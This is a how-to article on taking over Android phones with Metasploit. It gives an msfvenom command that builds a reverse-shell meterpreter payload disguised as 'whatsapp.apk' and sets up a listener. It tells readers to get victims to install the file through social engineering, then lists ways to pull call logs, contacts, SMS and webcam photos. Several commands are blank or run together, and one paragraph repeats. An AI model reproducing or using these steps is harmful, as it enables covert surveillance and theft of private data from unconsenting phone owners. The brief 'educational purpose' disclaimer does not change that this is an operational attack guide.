How to hack android WhatsApp, SMS, call logs any phone

Android is one of the most used open-source platforms by users, at the same time most hackers also hacked Android phones every day, so in this article, I will teach you how to hack Android phones and what’s app messages, SMS, and call history, etc., using Metasploit framework.

This article is posted only for educational purpose to spread awareness among people.

Android platforms only support apps with .apk extensions, so we are going to build our malicious payload in .apk format.

How to hack android Phone completely

Step 1:

First of all we need to install the Metasploit framework so type the below command in your terminal

									LINUXsudo apt-get install metasploitTERMUXpkg install metasploit							

Step 2:

Then we need to get our public IP address so type the below commands in your terminal 

									LINUXsudo ifconfigTERMUXifconfig							

How to hack android WhatsApp, SMS, call logs any phone

Step 3:

After that we need to create the payload so execute the below commands on your terminal

									msfvenom -p android/meterpreter/reverse_tcp lhost= lport=4444 R > whatsapp.apk							
  1. Lhost = ( according to your ip )

  2. Lport = ( according to you )

  3. = Raw Format

  4. P = ( platform )

How to hack android WhatsApp, SMS, call logs any phone

Step 4:

After creating the android Payload open the Metasploit framework using the following command


Then create the multi handler this will help you to get the reverse connection to the victim phone to your terminal so execute the following commands one by one

									use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost lport 4444exploit							

How to hack android WhatsApp, SMS, call logs any phone

Hack the victim phone

Now set the payload to victim phone you can use any social engineering technique 

How to hack android WhatsApp, SMS, call logs any phone

When victim will run this apk file you can oberve meterpreter session will open.

How to hack android WhatsApp, SMS, call logs any phone

After we hack victim’s phone, there are many things we can do by using these commands like call logs, camera, screenshots, WhatsApp chats, SMS details and much more. But we are going to show some of the main commands given below.

Android is one of the most used open-source platforms by users, at the same time most hackers also hacked Android phones every day, so in this article, I will teach you how to hack Android phones and what's app messages, SMS, and call history, etc., using Metasploit framework.

To show all features use the following command ;


Get OS Information ;


Check Device Rooted or Not


Check Installed APPS


Uninstall Specific Application

									app_uninstall <packege_name>							

Get All Call Logs


Get Contact List


Get SMS List


You can use webcam of victim for capture the picture


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